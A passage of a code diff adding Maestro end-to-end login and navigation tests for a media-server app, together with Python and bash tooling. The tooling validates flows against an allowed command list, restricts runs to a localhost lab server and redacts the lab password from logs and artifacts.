+    id: "Password"
+- inputText: "definitely-wrong-lab-password"
+- pressKey: enter
+- assertVisible: "Invalid username or password"
+
+# Reload between independent attempts. Maestro web can leave the cursor before
+# a short suffix after synthetic backspaces, so editing in place is unreliable.
+- launchApp
+- extendedWaitUntil:
+    visible: "Sign in to your server"
+    timeout: 15000
+- tapOn:
+    id: "Username"
+- inputText: "lab-user-does-not-exist"
+- tapOn:
+    id: "Password"
+- inputText: "definitely-wrong-lab-password"
+- pressKey: enter
+- assertVisible: "Invalid username or password"
+
+- launchApp
+- extendedWaitUntil:
+    visible: "Sign in to your server"
+    timeout: 15000
+- tapOn:
+    id: "Username"
+- inputText: ${MAESTRO_USERNAME}
+- tapOn:
+    id: "Password"
+- inputText:
+    text: ${MAESTRO_PASSWORD}
+    label: Enter the selected lab user's password
+- pressKey: enter
+- extendedWaitUntil:
+    visible: "(Secure your account|View Cantinarr Fixture Moon details)"
+    timeout: 20000
+- runFlow:
+    when:
+      visible: "Secure your account"
+    commands:
+      - tapOn: "Skip for now"
+- extendedWaitUntil:
+    visible: "View Cantinarr Fixture Moon details"
+    timeout: 20000
+- assertNotVisible: "Invalid username or password"

--- a/e2e/maestro/flows/authorization/requester-navigation.yaml
+++ b/e2e/maestro/flows/authorization/requester-navigation.yaml
@@ -1,0 +1,45 @@
+url: ${MAESTRO_SERVER_URL}
+name: Requester navigation boundary smoke
+tags:
+  - smoke
+  - lab
+  - authorization
+  - requester
+---
+# AUTH-022 (partial), NAV-003 (partial)
+- launchApp
+- extendedWaitUntil:
+    visible: "Sign in to your server"
+    timeout: 15000
+- tapOn:
+    id: "Username"
+- inputText: ${MAESTRO_USERNAME}
+- tapOn:
+    id: "Password"
+- inputText:
+    text: ${MAESTRO_PASSWORD}
+    label: Enter the selected lab user's password
+- pressKey: enter
+- extendedWaitUntil:
+    visible: "View Cantinarr Fixture Moon details"
+    timeout: 20000
+
+- tapOn:
+    point: "7%,4%"
+- assertVisible: "Navigate to Discover"
+- assertVisible: "Navigate to Settings"
+# The fixed tall viewport renders the complete drawer inventory, so none of
+# these negative checks can pass merely because a leaked module is offscreen.
+- assertNotVisible:
+    text: "Navigate to Radarr"
+- assertNotVisible:
+    text: "Navigate to Sonarr"
+- assertNotVisible:
+    text: "Navigate to Chaptarr"
+- assertNotVisible:
+    text: "Navigate to Downloads"
+- assertNotVisible:
+    text: "Navigate to Tautulli"
+- assertNotVisible: "Navigate to AI Assistant"
+- assertNotVisible: "Navigate to Approvals"
+- assertNotVisible: "Navigate to Agent fixes"

--- a/e2e/maestro/flows/navigation/admin-modules.yaml
+++ b/e2e/maestro/flows/navigation/admin-modules.yaml
@@ -1,0 +1,44 @@
+url: ${MAESTRO_SERVER_URL}
+name: Admin module navigation smoke
+tags:
+  - smoke
+  - lab
+  - navigation
+  - admin
+---
+# NAV-001 (partial), NAV-003 (partial)
+- launchApp
+- extendedWaitUntil:
+    visible: "Sign in to your server"
+    timeout: 15000
+- tapOn:
+    id: "Username"
+- inputText: ${MAESTRO_USERNAME}
+- tapOn:
+    id: "Password"
+- inputText:
+    text: ${MAESTRO_PASSWORD}
+    label: Enter the selected lab user's password
+- pressKey: enter
+- extendedWaitUntil:
+    visible: "(Secure your account|View Cantinarr Fixture Moon details)"
+    timeout: 20000
+- runFlow:
+    when:
+      visible: "Secure your account"
+    commands:
+      - tapOn: "Skip for now"
+- extendedWaitUntil:
+    visible: "View Cantinarr Fixture Moon details"
+    timeout: 20000
+
+- tapOn:
+    point: "7%,4%"
+- assertVisible: "Navigate to Discover"
+- assertVisible: "Navigate to Radarr"
+- assertVisible: "Navigate to Sonarr"
+- assertVisible: "Navigate to Chaptarr"
+- assertVisible: "Navigate to Downloads"
+- assertVisible: "Navigate to Tautulli"
+- assertVisible: "Navigate to Settings"
+- assertNotVisible: "Navigate to AI Assistant"

--- a/e2e/maestro/suites.json
+++ b/e2e/maestro/suites.json
@@ -1,0 +1,19 @@
+{
+  "schema_version": 1,
+  "suites": {
+    "smoke": [
+      {
+        "flow": "e2e/maestro/flows/auth/password-login.yaml",
+        "user": "lab-admin-b"
+      },
+      {
+        "flow": "e2e/maestro/flows/navigation/admin-modules.yaml",
+        "user": "lab-admin-b"
+      },
+      {
+        "flow": "e2e/maestro/flows/authorization/requester-navigation.yaml",
+        "user": "lab-no-grants"
+      }
+    ]
+  }
+}

--- a/scripts/check_test_automation.py
+++ b/scripts/check_test_automation.py
@@ -1,0 +1,481 @@
+#!/usr/bin/env python3
+"""Validate the master catalog and its machine-readable automation links."""
+
+from __future__ import annotations
+
+from collections import Counter
+import json
+from pathlib import Path
+import re
+import sys
+
+from maestro_safety import SafetyError, validate_maestro_config
+
+
+ROOT = Path(__file__).resolve().parents[1]
+CATALOG_DIR = ROOT / "docs" / "testing" / "catalog"
+README = ROOT / "docs" / "testing" / "README.md"
+MANIFEST = ROOT / "docs" / "testing" / "automation.json"
+SUITES = ROOT / "e2e" / "maestro" / "suites.json"
+FLOWS_DIR = ROOT / "e2e" / "maestro" / "flows"
+HELPERS_DIR = ROOT / "e2e" / "maestro" / "helpers"
+MAESTRO_CONFIG = ROOT / "e2e" / "maestro" / "config.yaml"
+
+CASE_RE = re.compile(
+    r"^- \[ \] `(?P<id>[A-Z]+-[0-9]{3})` · "
+    r"(?P<priority>P[0-2]) · (?P<tags>[A-Z]+(?:/[A-Z]+)*) — .+"
+)
+TABLE_RE = re.compile(
+    r"^\| \[[^]]+\]\(catalog/(?P<file>[^)]+)\) \| [^|]+ \| "
+    r"(?P<count>[0-9]+) \|$"
+)
+ALLOWED_STATUS = {"automated", "partial"}
+ALLOWED_USERS = {
+    "lab-admin",
+    "lab-admin-b",
+    "lab-requester",
+    "lab-restricted",
+    "lab-no-grants",
+}
+FORBIDDEN_FLOW_COMMANDS = {
+    "addMedia",
+    "assertNoDefectsWithAI",
+    "assertWithAI",
+    "copyText",
+    "copyTextFrom",
+    "evalScript",
+    "extractTextWithAI",
+    "openLink",
+    "runScript",
+}
+ALLOWED_FLOW_COMMANDS = {
+    "assertNotVisible",
+    "assertVisible",
+    "extendedWaitUntil",
+    "inputText",
+    "launchApp",
+    "pressKey",
+    "repeat",
+    "runFlow",
+    "scrollUntilVisible",
+    "swipe",
+    "tapOn",
+}
+FLOW_COMMAND_RE = re.compile(
+    r"^\s*-\s*(?P<command>[A-Za-z][A-Za-z0-9]*)(?P<suffix>\s*:.*)?$"
+)
+RUN_FLOW_FILE_RE = re.compile(r"^\s*[\"']?file[\"']?\s*:\s*(?P<path>.+?)\s*$")
+INTERPOLATION_RE = re.compile(r"\$\{(?P<expression>[^}\n]*)}")
+SIMPLE_VARIABLE_RE = re.compile(r"[A-Z][A-Z0-9_]*")
+ALLOWED_BODY_VARIABLES = {
+    "MAESTRO_PASSWORD",
+    "MAESTRO_USERNAME",
+    "TARGET_ID",
+    "TARGET_TEXT",
+}
+FLOW_URL_HEADER = "url: ${MAESTRO_SERVER_URL}"
+FLOW_TAG_RE = re.compile(r"  - [a-z0-9-]+")
+
+
+class ValidationError(Exception):
+    pass
+
+
+def load_json(path: Path) -> object:
+    try:
+        return json.loads(path.read_text())
+    except (OSError, json.JSONDecodeError) as exc:
+        raise ValidationError(f"cannot read valid JSON from {path.relative_to(ROOT)}: {exc}") from exc
+
+
+def parse_catalog() -> tuple[dict[str, dict[str, object]], Counter[str]]:
+    cases: dict[str, dict[str, object]] = {}
+    per_file: Counter[str] = Counter()
+    for path in sorted(CATALOG_DIR.glob("*.md")):
+        for line_number, line in enumerate(path.read_text().splitlines(), 1):
+            match = CASE_RE.match(line)
+            if not match:
+                continue
+            case_id = match.group("id")
+            if case_id in cases:
+                raise ValidationError(f"duplicate catalog case {case_id}")
+            tags = set(match.group("tags").split("/"))
+            cases[case_id] = {
+                "file": path.relative_to(ROOT).as_posix(),
+                "line": line_number,
+                "priority": match.group("priority"),
+                "tags": tags,
+            }
+            per_file[path.name] += 1
+    if not cases:
+        raise ValidationError("no catalog cases found")
+    return cases, per_file
+
+
+def validate_readme_counts(per_file: Counter[str], total: int) -> None:
+    declared: dict[str, int] = {}
+    declared_total: int | None = None
+    for line in README.read_text().splitlines():
+        match = TABLE_RE.match(line)
+        if match:
+            declared[match.group("file")] = int(match.group("count"))
+        if line.startswith("| **Total**"):
+            numbers = re.findall(r"\*\*([0-9]+)\*\*", line)
+            if numbers:
+                declared_total = int(numbers[-1])
+    if declared != dict(per_file):
+        raise ValidationError(
+            f"README per-file counts {declared} do not match catalog {dict(per_file)}"
+        )
+    if declared_total != total:
+        raise ValidationError(
+            f"README total {declared_total} does not match catalog total {total}"
+        )
+
+
+def normalized_repo_path(value: object, field: str) -> Path:
+    if not isinstance(value, str) or not value or value.startswith("/") or ".." in Path(value).parts:
+        raise ValidationError(f"{field} must be a non-empty repository-relative path")
+    path = ROOT / value
+    if not path.is_file():
+        raise ValidationError(f"{field} does not exist: {value}")
+    if path.is_symlink():
+        raise ValidationError(f"{field} must not be a symlink: {value}")
+    return path
+
+
+def unquoted_scalar(value: str) -> str:
+    value = value.strip()
+    if len(value) >= 2 and value[0] == value[-1] and value[0] in {'"', "'"}:
+        return value[1:-1]
+    return value
+
+
+def validate_helper_reference(
+    source: Path,
+    reference: str,
+    validated_helpers: set[Path],
+    visiting_helpers: set[Path],
+) -> None:
+    reference = unquoted_scalar(reference)
+    if not reference or "${" in reference or "#" in reference:
+        raise ValidationError(
+            f"{source.relative_to(ROOT)} has a dynamic or malformed runFlow helper path"
+        )
+    try:
+        helper = (source.parent / reference).resolve(strict=True)
+        helpers_root = HELPERS_DIR.resolve(strict=True)
+    except OSError as exc:
+        raise ValidationError(
+            f"{source.relative_to(ROOT)} references a missing runFlow helper: {reference}"
+        ) from exc
+    if helper.suffix not in {".yaml", ".yml"} or helpers_root not in helper.parents:
+        raise ValidationError(
+            f"{source.relative_to(ROOT)} runFlow files must live under "
+            "e2e/maestro/helpers"
+        )
+    if helper in visiting_helpers:
+        raise ValidationError(f"recursive Maestro helper reference: {helper.relative_to(ROOT)}")
+    if helper in validated_helpers:
+        return
+
+    visiting_helpers.add(helper)
+    validate_maestro_commands(
+        helper,
+        helper.read_text(),
+        validated_helpers=validated_helpers,
+        visiting_helpers=visiting_helpers,
+    )
+    visiting_helpers.remove(helper)
+    validated_helpers.add(helper)
+
+
+def validate_maestro_commands(
+    path: Path,
+    body: str,
+    *,
+    validated_helpers: set[Path] | None = None,
+    visiting_helpers: set[Path] | None = None,
+    first_line_number: int = 1,
+) -> None:
+    relative = path.relative_to(ROOT).as_posix()
+    if re.search(r"https?://", body):
+        raise ValidationError(f"{relative} hardcodes a network URL")
+    if "maestro cloud" in body.lower():
+        raise ValidationError(f"{relative} must not use Maestro Cloud")
+    if "${MAESTRO_SERVER_URL}" in body:
+        raise ValidationError(f"{relative} may use MAESTRO_SERVER_URL only in its header")
+    matches = list(INTERPOLATION_RE.finditer(body))
+    if body.count("${") != len(matches):
+        raise ValidationError(f"{relative} contains malformed Maestro interpolation")
+    for match in matches:
+        expression = match.group("expression")
+        if not SIMPLE_VARIABLE_RE.fullmatch(expression):
+            raise ValidationError(
+                f"{relative} contains a dynamic Maestro expression; only fixed variables are allowed"
+            )
+        if expression not in ALLOWED_BODY_VARIABLES:
+            raise ValidationError(f"{relative} uses unapproved Maestro variable {expression}")
+
+    validated_helpers = validated_helpers if validated_helpers is not None else set()
+    visiting_helpers = visiting_helpers if visiting_helpers is not None else set()
+    active_run_flow_indent: int | None = None
+    active_input_text_indent: int | None = None
+    for line_number, line in enumerate(body.splitlines(), first_line_number):
+        stripped = line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue
+        indent = len(line) - len(line.lstrip())
+        if active_run_flow_indent is not None and indent <= active_run_flow_indent:
+            active_run_flow_indent = None
+        if active_input_text_indent is not None and indent <= active_input_text_indent:
+            active_input_text_indent = None
+
+        match = FLOW_COMMAND_RE.match(line)
+        if match:
+            command = match.group("command")
+            suffix = (match.group("suffix") or "").strip()
+            if command in FORBIDDEN_FLOW_COMMANDS:
+                raise ValidationError(
+                    f"{relative}:{line_number} uses forbidden Maestro command {command}"
+                )
+            if command not in ALLOWED_FLOW_COMMANDS:
+                raise ValidationError(
+                    f"{relative}:{line_number} uses unapproved Maestro command {command}"
+                )
+            if command == "launchApp" and suffix:
+                raise ValidationError(
+                    f"{relative}:{line_number} must launch only the configured lab URL"
+                )
+            if command == "runFlow":
+                reference = suffix[1:].strip() if suffix.startswith(":") else suffix
+                if reference:
+                    validate_helper_reference(
+                        path, reference, validated_helpers, visiting_helpers
+                    )
+                else:
+                    active_run_flow_indent = indent
+            if command == "inputText":
+                value = suffix[1:].strip() if suffix.startswith(":") else suffix
+                if value:
+                    if "${MAESTRO_PASSWORD}" in value and unquoted_scalar(value) != "${MAESTRO_PASSWORD}":
+                        raise ValidationError(
+                            f"{relative}:{line_number} mixes the lab password with other input"
+                        )
+                else:
+                    active_input_text_indent = indent
+            elif "${MAESTRO_PASSWORD}" in line:
+                raise ValidationError(
+                    f"{relative}:{line_number} may use the lab password only as inputText"
+                )
+            continue
+
+        if stripped.startswith("-"):
+            raise ValidationError(
+                f"{relative}:{line_number} uses unsupported Maestro command syntax"
+            )
+
+        run_flow_file = RUN_FLOW_FILE_RE.match(line)
+        if active_run_flow_indent is not None and run_flow_file:
+            validate_helper_reference(
+                path,
+                run_flow_file.group("path"),
+                validated_helpers,
+                visiting_helpers,
+            )
+        if "${MAESTRO_PASSWORD}" in line:
+            allowed_password_line = (
+                active_input_text_indent is not None
+                and stripped.startswith("text:")
+                and unquoted_scalar(stripped.split(":", 1)[1]) == "${MAESTRO_PASSWORD}"
+            )
+            if not allowed_password_line:
+                raise ValidationError(
+                    f"{relative}:{line_number} may use the lab password only as inputText"
+                )
+
+
+def validate_flow(path: Path, validated_helpers: set[Path] | None = None) -> None:
+    relative = path.relative_to(ROOT).as_posix()
+    if path.is_symlink():
+        raise ValidationError(f"{relative} must not be a symlink")
+    text = path.read_text()
+    lines = text.splitlines()
+    if not lines or lines[0] != FLOW_URL_HEADER:
+        raise ValidationError(
+            f"{relative} must use the exact loopback origin supplied by the lab"
+        )
+    if "\n---\n" not in text or "\ntags:\n" not in text or "\nname:" not in text:
+        raise ValidationError(f"{relative} is missing Maestro name, tags, or header separator")
+    if "${MAESTRO_PASSWORD}" not in text or "${MAESTRO_USERNAME}" not in text:
+        raise ValidationError(f"{relative} must receive the selected lab identity from the wrapper")
+
+    header, body = text.split("\n---\n", 1)
+    header_lines = header.splitlines()
+    canonical_header = (
+        len(header_lines) >= 4
+        and header_lines[0] == FLOW_URL_HEADER
+        and header_lines[1].startswith("name: ")
+        and bool(header_lines[1].removeprefix("name: ").strip())
+        and header_lines[2] == "tags:"
+        and all(FLOW_TAG_RE.fullmatch(line) for line in header_lines[3:])
+    )
+    if not canonical_header:
+        raise ValidationError(f"{relative} has fields outside the reviewed Maestro header schema")
+    if header.count("${MAESTRO_SERVER_URL}") != 1:
+        raise ValidationError(f"{relative} has an invalid Maestro server URL header")
+    if "${MAESTRO_PASSWORD}" in header:
+        raise ValidationError(f"{relative} may use the lab password only in inputText")
+    header_interpolations = [
+        match.group("expression") for match in INTERPOLATION_RE.finditer(header)
+    ]
+    if header_interpolations != ["MAESTRO_SERVER_URL"]:
+        raise ValidationError(f"{relative} has an unsafe Maestro header interpolation")
+    validate_maestro_commands(
+        path,
+        body,
+        validated_helpers=validated_helpers,
+        first_line_number=len(header.splitlines()) + 2,
+    )
+
+
+def validate_manifest(cases: dict[str, dict[str, object]]) -> tuple[int, int, set[Path]]:
+    data = load_json(MANIFEST)
+    if not isinstance(data, dict) or data.get("schema_version") != 1:
+        raise ValidationError("automation manifest schema_version must be 1")
+    proofs = data.get("proofs")
+    if not isinstance(proofs, list):
+        raise ValidationError("automation manifest proofs must be a list")
+
+    seen: set[tuple[str, str, str, tuple[str, ...]]] = set()
+    mapped_flows: set[Path] = set()
+    statuses: Counter[str] = Counter()
+    for index, proof in enumerate(proofs):
+        if not isinstance(proof, dict):
+            raise ValidationError(f"proof {index} must be an object")
+        expected = {"case_id", "status", "runner", "specs", "scope"}
+        if set(proof) != expected:
+            raise ValidationError(f"proof {index} fields must be exactly {sorted(expected)}")
+        case_id = proof["case_id"]
+        status = proof["status"]
+        runner = proof["runner"]
+        scope = proof["scope"]
+        specs = proof["specs"]
+        if case_id not in cases:
+            raise ValidationError(f"proof {index} references unknown case {case_id}")
+        if status not in ALLOWED_STATUS:
+            raise ValidationError(f"proof {case_id} has invalid status {status}")
+        if not isinstance(runner, str) or not re.fullmatch(r"[a-z0-9-]+", runner):
+            raise ValidationError(f"proof {case_id} has invalid runner")
+        if not isinstance(scope, str) or len(scope.strip()) < 20:
+            raise ValidationError(f"proof {case_id} needs a specific scope statement")
+        if not isinstance(specs, list) or not specs:
+            raise ValidationError(f"proof {case_id} needs at least one spec")
+
+        normalized_specs: list[str] = []
+        for value in specs:
+            path = normalized_repo_path(value, f"proof {case_id} spec")
+            normalized_specs.append(path.relative_to(ROOT).as_posix())
+            if path.suffix in {".yaml", ".yml"} and FLOWS_DIR in path.parents:
+                validate_flow(path)
+                if case_id not in path.read_text():
+                    raise ValidationError(f"{path.relative_to(ROOT)} does not name mapped case {case_id}")
+                mapped_flows.add(path)
+        identity = (case_id, status, runner, tuple(normalized_specs))
+        if identity in seen:
+            raise ValidationError(f"duplicate proof mapping for {case_id}")
+        seen.add(identity)
+        if status == "automated" and "AUTO" not in cases[case_id]["tags"]:
+            raise ValidationError(f"automated case {case_id} must carry the AUTO catalog tag")
+        statuses[status] += 1
+    return statuses["automated"], statuses["partial"], mapped_flows
+
+
+def validate_suites(mapped_flows: set[Path]) -> None:
+    data = load_json(SUITES)
+    if not isinstance(data, dict) or data.get("schema_version") != 1:
+        raise ValidationError("Maestro suites schema_version must be 1")
+    suites = data.get("suites")
+    if not isinstance(suites, dict) or not suites:
+        raise ValidationError("Maestro suites must be a non-empty object")
+
+    suite_flows: set[Path] = set()
+    validated_helpers: set[Path] = set()
+    for suite_name, entries in suites.items():
+        if not re.fullmatch(r"[a-z0-9-]+", suite_name) or not isinstance(entries, list) or not entries:
+            raise ValidationError(f"invalid or empty Maestro suite {suite_name}")
+        for entry in entries:
+            if not isinstance(entry, dict) or set(entry) != {"flow", "user"}:
+                raise ValidationError(f"suite {suite_name} entries need exactly flow and user")
+            if entry["user"] not in ALLOWED_USERS:
+                raise ValidationError(f"suite {suite_name} uses unknown lab user {entry['user']}")
+            flow = normalized_repo_path(entry["flow"], f"suite {suite_name} flow")
+            if FLOWS_DIR not in flow.parents:
+                raise ValidationError(f"suite {suite_name} flow is outside e2e/maestro/flows")
+            validate_flow(flow, validated_helpers)
+            if flow in suite_flows:
+                raise ValidationError(f"flow appears more than once across suites: {flow.relative_to(ROOT)}")
+            suite_flows.add(flow)
+
+    repository_flows = set(FLOWS_DIR.rglob("*.yaml")) | set(FLOWS_DIR.rglob("*.yml"))
+    if repository_flows != suite_flows:
+        missing = sorted(path.relative_to(ROOT).as_posix() for path in repository_flows - suite_flows)
+        extra = sorted(path.relative_to(ROOT).as_posix() for path in suite_flows - repository_flows)
+        raise ValidationError(f"suite/flow mismatch; missing={missing}, extra={extra}")
+    if not suite_flows.issubset(mapped_flows):
+        missing = sorted(path.relative_to(ROOT).as_posix() for path in suite_flows - mapped_flows)
+        raise ValidationError(f"Maestro flows lack catalog mappings: {missing}")
+
+    repository_helpers = set(HELPERS_DIR.rglob("*.yaml")) | set(HELPERS_DIR.rglob("*.yml"))
+    for helper in sorted(repository_helpers - validated_helpers):
+        validate_maestro_commands(helper, helper.read_text(), validated_helpers=validated_helpers)
+
+
+def main() -> int:
+    try:
+        validate_maestro_config(MAESTRO_CONFIG)
+    except SafetyError as exc:
+        raise ValidationError(f"unsafe e2e/maestro/config.yaml: {exc}") from exc
+    cases, per_file = parse_catalog()
+    validate_readme_counts(per_file, len(cases))
+    automated, partial, mapped_flows = validate_manifest(cases)
+    validate_suites(mapped_flows)
+
+    auto_cases = {case_id for case_id, data in cases.items() if "AUTO" in data["tags"]}
+    mapped_automated = {
+        proof["case_id"]
+        for proof in load_json(MANIFEST)["proofs"]
+        if proof["status"] == "automated"
+    }
+    print(
+        "test automation catalog valid: "
+        f"{len(cases)} parent cases, {automated} automated mapping(s), "
+        f"{partial} partial mapping(s), {len(mapped_flows)} Maestro flow(s), "
+        f"{len(auto_cases - mapped_automated)} pre-existing AUTO case(s) awaiting manifest linkage"
+    )
+    return 0
+
+
+def cli() -> int:
+    arguments = sys.argv[1:]
+    if arguments:
+        if len(arguments) != 2 or arguments[0] != "--flow":
+            raise ValidationError("usage: check_test_automation.py [--flow FLOW.yaml]")
+        try:
+            validate_maestro_config(MAESTRO_CONFIG)
+        except SafetyError as exc:
+            raise ValidationError(f"unsafe e2e/maestro/config.yaml: {exc}") from exc
+        flow = Path(arguments[1])
+        if not flow.is_absolute() or FLOWS_DIR not in flow.parents:
+            raise ValidationError("runtime flow must be an absolute path under e2e/maestro/flows")
+        validate_flow(flow)
+        return 0
+    return main()
+
+
+if __name__ == "__main__":
+    try:
+        raise SystemExit(cli())
+    except ValidationError as exc:
+        print(f"test automation validation failed: {exc}", file=sys.stderr)
+        raise SystemExit(1)

--- a/scripts/maestro_safety.py
+++ b/scripts/maestro_safety.py
@@ -1,0 +1,82 @@
+#!/usr/bin/env python3
+"""Shared safety checks for the local Maestro web harness."""
+
+from __future__ import annotations
+
+import argparse
+from pathlib import Path
+import sys
+from urllib.parse import urlsplit
+
+
+EXPECTED_MAESTRO_CONFIG = """flows:
+  - "flows/**/*.yaml"
+executionOrder:
+  continueOnFailure: false
+testOutputDir: .artifacts
+"""
+
+
+class SafetyError(ValueError):
+    """Raised when a Maestro runtime value crosses a safety boundary."""
+
+
+def validate_loopback_http_url(value: str) -> None:
+    """Require an unambiguous HTTP base URL for the local SSH tunnel."""
+
+    if not value or any(ord(character) < 0x20 for character in value):
+        raise SafetyError("URL must be a non-empty single-line value")
+    if "?" in value or "#" in value:
+        raise SafetyError("URL must not contain a query or fragment delimiter")
+
+    try:
+        parsed = urlsplit(value)
+        port = parsed.port
+    except ValueError as exc:
+        raise SafetyError("URL has an invalid host or port") from exc
+
+    if parsed.scheme != "http":
+        raise SafetyError("URL scheme must be http")
+    if parsed.username is not None or parsed.password is not None:
+        raise SafetyError("URL must not contain user information")
+    if parsed.hostname not in {"127.0.0.1", "localhost"}:
+        raise SafetyError("URL host must be 127.0.0.1 or localhost")
+    if port is None or not 1 <= port <= 65535:
+        raise SafetyError("URL must contain an explicit valid port")
+    if parsed.path or parsed.query or parsed.fragment:
+        raise SafetyError("URL must be an origin without a path, query, or fragment")
+
+
+def validate_maestro_config(path: Path) -> None:
+    """Require the fixed local-only Maestro config, without hooks or scripts."""
+
+    if path.is_symlink():
+        raise SafetyError("Maestro config must not be a symlink")
+    try:
+        contents = path.read_text()
+    except OSError as exc:
+        raise SafetyError("Maestro config could not be read") from exc
+    if contents != EXPECTED_MAESTRO_CONFIG:
+        raise SafetyError("Maestro config differs from the reviewed local-only schema")
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--config", required=True, type=Path)
+    parser.add_argument("url", help="candidate Maestro server origin")
+    args = parser.parse_args()
+    try:
+        validate_loopback_http_url(args.url)
+    except SafetyError as exc:
+        print(f"invalid Maestro loopback URL: {exc}", file=sys.stderr)
+        return 1
+    try:
+        validate_maestro_config(args.config)
+    except SafetyError as exc:
+        print(f"invalid Maestro config: {exc}", file=sys.stderr)
+        return 1
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/redact_maestro.py
+++ b/scripts/redact_maestro.py
@@ -1,0 +1,80 @@
+#!/usr/bin/env python3
+"""Redact the selected lab password from Maestro output and artifacts."""
+
+from __future__ import annotations
+
+import argparse
+import os
+from pathlib import Path
+import sys
+
+
+REDACTION = "[REDACTED LAB PASSWORD]"
+
+
+def secrets_from_environment() -> list[str]:
+    values = [os.environ.get("MAESTRO_PASSWORD", "")]
+    return sorted({value for value in values if value}, key=len, reverse=True)
+
+
+def redact_text(value: str, secrets: list[str]) -> str:
+    for secret in secrets:
+        value = value.replace(secret, REDACTION)
+    return value
+
+
+def stream(secrets: list[str]) -> int:
+    for line in sys.stdin:
+        sys.stdout.write(redact_text(line, secrets))
+        sys.stdout.flush()
+    return 0
+
+
+def sanitize_tree(root: Path, secrets: list[str]) -> int:
+    if not root.exists():
+        return 0
+
+    replacements = [(secret.encode(), REDACTION.encode()) for secret in secrets]
+    for path in sorted(root.rglob("*")):
+        if path.is_symlink():
+            raise RuntimeError(f"artifact tree contains a symlink: {path}")
+        if not path.is_file():
+            continue
+        relative = path.relative_to(root).as_posix()
+        if any(secret in relative for secret in secrets):
+            raise RuntimeError(f"artifact filename contains a secret: {path}")
+        data = path.read_bytes()
+        sanitized = data
+        for secret, replacement in replacements:
+            sanitized = sanitized.replace(secret, replacement)
+        if sanitized != data:
+            path.write_bytes(sanitized)
+        for secret, _ in replacements:
+            if secret in path.read_bytes():
+                raise RuntimeError(f"secret redaction failed for {path}")
+    return 0
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser()
+    subparsers = parser.add_subparsers(dest="command", required=True)
+    subparsers.add_parser("stream")
+    tree_parser = subparsers.add_parser("tree")
+    tree_parser.add_argument("root", type=Path)
+    args = parser.parse_args()
+
+    secrets = secrets_from_environment()
+    if not secrets:
+        print("MAESTRO_PASSWORD is required for redaction", file=sys.stderr)
+        return 2
+    if args.command == "stream":
+        return stream(secrets)
+    return sanitize_tree(args.root, secrets)
+
+
+if __name__ == "__main__":
+    try:
+        raise SystemExit(main())
+    except (OSError, RuntimeError) as exc:
+        print(f"maestro redaction failed: {exc}", file=sys.stderr)
+        raise SystemExit(1)

--- a/scripts/run-maestro-flow.sh
+++ b/scripts/run-maestro-flow.sh
@@ -1,0 +1,136 @@
+#!/usr/bin/env bash
+
+set -Eeuo pipefail
+umask 077
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)"
+readonly SCRIPT_DIR
+ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd -P)"
+readonly ROOT_DIR
+readonly TESTED_MAESTRO_VERSION="2.6.1"
+
+die() {
+  printf 'maestro flow failed: %s\n' "$*" >&2
+  exit 1
+}
+
+[[ $# -eq 1 ]] || die "usage: scripts/run-maestro-flow.sh FLOW.yaml"
+flow_dir="$(cd "$(dirname "$1")" 2>/dev/null && pwd -P)" || die "flow directory does not exist"
+flow="${flow_dir}/$(basename "$1")"
+[[ -f "${flow}" ]] || die "flow does not exist: ${flow}"
+[[ ! -L "${flow}" ]] || die "flow must not be a symlink"
+[[ "${flow}" == "${ROOT_DIR}/e2e/maestro/flows/"* ]] || die "flow must live under e2e/maestro/flows"
+python3 "${SCRIPT_DIR}/check_test_automation.py" --flow "${flow}" >/dev/null ||
+  die "flow failed the local safety validator"
+
+for variable in MAESTRO_SERVER_URL MAESTRO_USERNAME MAESTRO_PASSWORD; do
+  [[ -n "${!variable:-}" ]] || die "${variable} was not supplied by the lab wrapper"
+done
+python3 "${SCRIPT_DIR}/maestro_safety.py" \
+  --config "${ROOT_DIR}/e2e/maestro/config.yaml" \
+  -- "${MAESTRO_SERVER_URL}" ||
+  die "Maestro URL/config safety validation failed"
+
+java_major_version() {
+  command -v java >/dev/null 2>&1 || return 1
+  java -version 2>&1 \
+    | sed -nE 's/.*version "([0-9]+).*/\1/p' \
+    | head -n 1
+}
+
+java_is_supported() {
+  local major
+  major="$(java_major_version)" || return 1
+  case "${major}" in
+    17 | 21) return 0 ;;
+    *) return 1 ;;
+  esac
+}
+
+if ! java_is_supported; then
+  if command -v brew >/dev/null 2>&1; then
+    for formula in openjdk@21 openjdk@17; do
+      if prefix="$(brew --prefix "${formula}" 2>/dev/null)"; then
+        export JAVA_HOME="${prefix}/libexec/openjdk.jdk/Contents/Home"
+        export PATH="${JAVA_HOME}/bin:${PATH}"
+        break
+      fi
+    done
+  fi
+fi
+java_major="$(java_major_version || true)"
+case "${java_major}" in
+  17 | 21) ;;
+  *) die "Java 17 or 21 is required by Maestro (found ${java_major:-unknown})" ;;
+esac
+if ! command -v maestro >/dev/null 2>&1 && [[ -x "${HOME}/.maestro/bin/maestro" ]]; then
+  export PATH="${HOME}/.maestro/bin:${PATH}"
+fi
+command -v maestro >/dev/null 2>&1 ||
+  die "Maestro ${TESTED_MAESTRO_VERSION} is required; see docs/testing/automation.md"
+
+export MAESTRO_CLI_NO_ANALYTICS=true
+export MAESTRO_CLI_ANALYSIS_NOTIFICATION_DISABLED=true
+export MAESTRO_DISABLE_UPDATE_CHECK=true
+
+maestro_version="$(maestro --version 2>/dev/null | sed -nE 's/.*([0-9]+\.[0-9]+\.[0-9]+).*/\1/p' | head -n 1)"
+[[ -n "${maestro_version}" ]] || die "could not determine the Maestro version"
+[[ "${maestro_version}" == "${TESTED_MAESTRO_VERSION}" ]] ||
+  die "Maestro ${TESTED_MAESTRO_VERSION} is required (found ${maestro_version})"
+
+relative="${flow#"${ROOT_DIR}/e2e/maestro/flows/"}"
+slug="${relative%.yaml}"
+slug="${slug//\//-}"
+run_id="$(date -u +%Y%m%dT%H%M%SZ)-$$"
+artifacts="${ROOT_DIR}/e2e/maestro/.artifacts/${slug}/${run_id}"
+mkdir -p "${artifacts}/debug"
+chmod 0700 "${ROOT_DIR}/e2e/maestro/.artifacts" "${artifacts}" "${artifacts}/debug"
+
+artifacts_sanitized=0
+
+sanitize_or_remove_artifacts() {
+  if python3 "${SCRIPT_DIR}/redact_maestro.py" tree "${artifacts}"; then
+    artifacts_sanitized=1
